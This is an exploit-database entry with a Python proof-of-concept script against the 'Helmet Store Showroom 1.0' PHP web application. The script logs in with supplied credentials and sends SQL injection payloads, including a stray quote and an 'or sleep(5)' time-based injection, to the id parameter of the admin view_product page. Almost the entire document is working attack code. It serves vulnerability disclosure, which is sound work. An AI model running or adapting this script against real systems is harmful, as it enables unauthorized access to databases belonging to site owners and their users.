## https://sploitus.com/exploit?id=1337DAY-ID-38083
# Exploit Title: Helmet Store Showroom 1.0 - authenticated SQL Injection
# Exploit Author: syad
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html
# Version: 1.0
# Tested on: Windows 10 + XAMPP 3.2.4
# CVE ID : N/A
# Description
# The id parameter does not perform input validation on the view_product.php file it allow authenticated Time Based SQL Injection.
import requests
import sys
import pyfiglet
sess = requests.Session()
proxies = {"https": "https://127.0.0.1:8080", "http": "http://127.0.0.1:8080"}
def login1(ip,username,password):
x = "http://%s/hss/classes/Login.php?f=login" % ip
login = {'username':username, 'password':password}
r = sess.post(x, data=login, proxies=proxies)
#print(r.content)
def login(ip):
x = ("http://%s/hss/admin") % ip
r = sess.get(x,proxies=proxies)
if "Welcome to Helmet Store Showroom - PHP" in r.text:
print("--------------------------------------------")
print("[+] Success Login")
def detect_sql(ip):
x = "http://%s/hss/admin/?page=products/view_product&id=2'" % ip
r = sess.get(x,proxies=proxies)
if "You have an error in your SQL syntax" in r.text:
print("[+] Found SQL Error")
def time_based_sqli(ip):
x = "http://%s/hss/admin/?page=products/view_product&id=2'+or+sleep(5)--+-" % ip
r = sess.get(x,proxies=proxies)
print("[+] Time Based SQL Found")
print("[*]!!! Time To Report !!!")
if __name__ == "__main__":
result = pyfiglet.figlet_format("PWN")
print(result)
try:
ip = sys.argv[1].strip()
username = sys.argv[2].strip()
password = sys.argv[3].strip()
except IndexError:
print("[-] Usage %s <ip> <username> <password>" % sys.argv[0])
print("[-] Example: %s 192.168.1.x" % sys.argv[0])
sys.exit(-1)
login1(ip,username,password)
login(ip)
detect_sql(ip)
time_based_sqli(ip)